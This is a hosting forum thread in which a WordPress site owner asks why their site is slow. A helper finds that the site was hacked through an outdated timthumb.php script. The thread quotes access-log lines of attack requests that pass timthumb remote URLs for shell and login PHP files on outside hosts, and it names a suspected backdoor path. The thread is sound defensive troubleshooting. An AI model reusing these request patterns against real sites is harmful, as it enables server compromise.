Very slow website


#1

I’ve been using DreamHost since Jan of this year and everything has been pretty good so far (I’m new to this whole running-a-website-malarky). That is, until today when I find my website is running insanely slow. I can’t work out what the bananas is going on, so I turn to you guys for help!

My website is www.hackedonxbox.com. I use WordPress (which is all updated) and I’m finding this slowness quite troublesome as I am trying to post/edit things on there, but keep finding Error 404 as the pages seem to be loading and then timing out. Argh!

Any help would be much appreciated. Thank you!


#2

How fast do you want it? I get a 5s load time which is not bad (not impressive either, but reasonable).

I’m seeing a failed request from the addtoany javascript.
This file looks suspiciously like a backdoor: http://www.hackedonxbox.com/wp-content/plugins/xhanch-my-twitter/css/css.php
Other than that, your page requires 50 requests, so it’s going to take time. Consolidate your JS & CSS or get rid of some plugins. If you really want to optimise, you can sprite some of your smaller images (rss.png, twitter.png, etc).

you might also look into your connection to DH…

[later]

I looked around a bit more and noticed that your stats are publicly available. they probably shouldn’t be, but that’s your choice. Don’t take this the wrong way, but it seems that your site is fairly light on content and traffic, so I wonder why your stats are showing 1GB of traffic per day. I would suspect that your account might be compromised unless you have some hidden media files that I didn’t notice.

[even later]

you’ve been hacked. see these requests in your stats?
#reqs file
89 /wp-content/themes/arras/library/timthumb.php
22 /wp-content/themes/arras/library/timthumb.php?src=http://blogger.com.secretosdecuna.com/content/canon.php
11 /wp-content/themes/arras/library/timthumb.php?src=http://picasa.combos.orgasmguide.org/byroe.php
10 /wp-content/themes/arras/library/timthumb.php?src=http://picasa.com.kereny.ro/go.php

Check the wiki to troubleshooting hacked sites: wiki.dreamhost.com/Troubleshooting_Hacked_Sites

[even even later]

probably happened in april according to your stats:
334 /wp-content/themes/arras/library/timthumb.php
61 /wp-content/themes/arras/library/timthumb.php?src=http://blogger.com.aceaswift.com/content/login.php
44 /wp-content/themes/arras/library/timthumb.php?src=http://flickr.com.vialivredourados.com.br/content/content.php
40 /wp-content/themes/arras/library/timthumb.php?src=http://flickr.com.vialivredourados.com.br/content/login.php
30 /wp-content/themes/arras/library/timthumb.php?src=http://blogger.com.crediyasa.com/content/tes.php
26 /wp-content/themes/arras/library/timthumb.php?src=http://img.youtube.com.kmginsights.com/content/login.php
23 /wp-content/themes/arras/library/timthumb.php?src=http://flickr.com.homemissionbrasil.com.br/content/alapyu.php
19 /wp-content/themes/arras/library/timthumb.php?src=http://blogger.com.plainlanddental.com.au/jack.php
14 /wp-content/themes/arras/library/timthumb.php?src=http://blogger.com.vocesdelaesperanza.com/shell.php
11 /wp-content/themes/arras/library/timthumb.php?src=http://www.poppylou.com.au/spread.php


#3

Thank you for such a detailed response, I have absolutely no idea what to do now, but I will look at the troubleshooting page and see if that can help me fix this. Ugh, wonderful :frowning:

[UPDATE]

Okay, I’ve removed the suspect files and changed from FTP to shell. I managed to find this:

I’m the ‘hackon’ user, are those other users the people who have gotten into my website? I can’t work out how to restrict their access. There is only one user set up on the dreamhost panel =/ I can’t kick or ban them because when I do who -u in SSH it only shows me there and none of those people. Argh. So confuuuuuuuuused.

[UPDATE 2]

As I’ve switched from FTP to SSH I have killed all FTP connections and disallowed FTP.

[UPDATE 3]

From that troubleshooting page I’ve worked out that my own username/password were not logged into by anyone else, that none of my files are in world-writable directories…

Bah, this stuff is so confusing. I’m trying my best to learn as I go along and solve this.


#4

Nevermind, I realise that ‘last -20’ shows everyone on the shared server. Phew!


#5

Yeah, that’s everyone. You don’t need world-writeable files or directories. You have an outdated utility in a theme called timthumb which can be used to place files on your server which gives someone complete access to your account. You need to get rid of that utility or upgrade it, and remove the files that were placed there. You can identify some of them from your logs, others may require some other techniques. It may be easiest to just backup your DB and site, wipe everything, start with a fresh updated install of WP and the theme you like, then rebuild. Either way, if you don’t know what you are doing, it may be more efficient to find someone who does. It takes time, and much more time if you have to learn as you go.